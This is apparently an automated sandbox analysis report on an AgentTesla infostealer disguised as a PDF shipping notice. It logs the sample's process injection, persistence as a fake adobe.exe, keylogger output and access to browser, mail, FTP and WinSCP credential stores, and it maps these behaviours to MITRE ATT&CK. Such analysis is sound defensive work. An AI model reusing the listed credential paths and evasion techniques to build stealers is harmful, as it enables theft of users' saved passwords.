Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597080	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596843	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596723	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594421	Jump to behavior

Source: Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4606500506.0000000000D5C000.00000004.00000020.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.2363048231.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4607960168.0000000001373000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.2839b9c.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.2839b9c.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.2839b9c.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack, WzE.cs	Reference to suspicious API methods: GXmc.OpenProcess(jHxuhfTis5.DuplicateHandle, bInheritHandle: true, (uint)bTRx6NbOE.ProcessID)

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Process created: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe "C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"	Jump to behavior

Source: Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4609963887.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4609963887.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q><b>[ Program Manager]</b> (12/08/2024 09:43:24)<br>{Win}r{Win}TH
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4609963887.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4609963887.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <html>Time: 08/26/2024 14:44:57<br>User Name: user<br>Computer Name: 965543<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 8.46.123.33<br><hr><b>[ Program Manager]</b> (12/08/2024 09:43:24)<br>{Win}r{Win}r</html>
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4609963887.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q9<b>[ Program Manager]</b> (12/08/2024 09:43:24)<br>{Win}rTH
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4609963887.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q?<b>[ Program Manager]</b> (12/08/2024 09:43:24)<br>{Win}r{Win}rTH
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4609963887.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q3<b>[ Program Manager]</b> (12/08/2024 09:43:24)<br>
Source: Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4609963887.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q8<b>[ Program Manager]</b> (12/08/2024 09:43:24)<br>{Win}

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Queries volume information: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Queries volume information: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Code function: 5_2_017C6CD8 GetUserNameW,

5_2_017C6CD8

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3852970.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4611154293.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4609963887.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4609963887.0000000002AAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2361618882.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2364755330.000000000358C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2364755330.0000000003561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4611154293.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2147638567.00000000037E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Arrival Notice - BL 713410220035.PDF.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Arrival Notice - BL 713410220035.PDF.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 3804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 4972, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3852970.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4609963887.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2361618882.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2364755330.0000000003561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4611154293.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2147638567.00000000037E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Arrival Notice - BL 713410220035.PDF.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Arrival Notice - BL 713410220035.PDF.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 3804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 4972, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Arrival Notice - BL 713410220035.PDF.exe.3852970.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4611154293.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4609963887.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4609963887.0000000002AAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2361618882.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2364755330.000000000358C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2364755330.0000000003561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4611154293.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2147638567.00000000037E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Arrival Notice - BL 713410220035.PDF.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Arrival Notice - BL 713410220035.PDF.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 3804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 4972, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 Account Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Registry Run Keys / Startup Folder	12 Process Injection	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	121 Obfuscated Files or Information	1 Credentials in Registry	24 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	211 Security Software Discovery	SSH	1 Clipboard Data	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Masquerading	DCSync	141 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	141 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
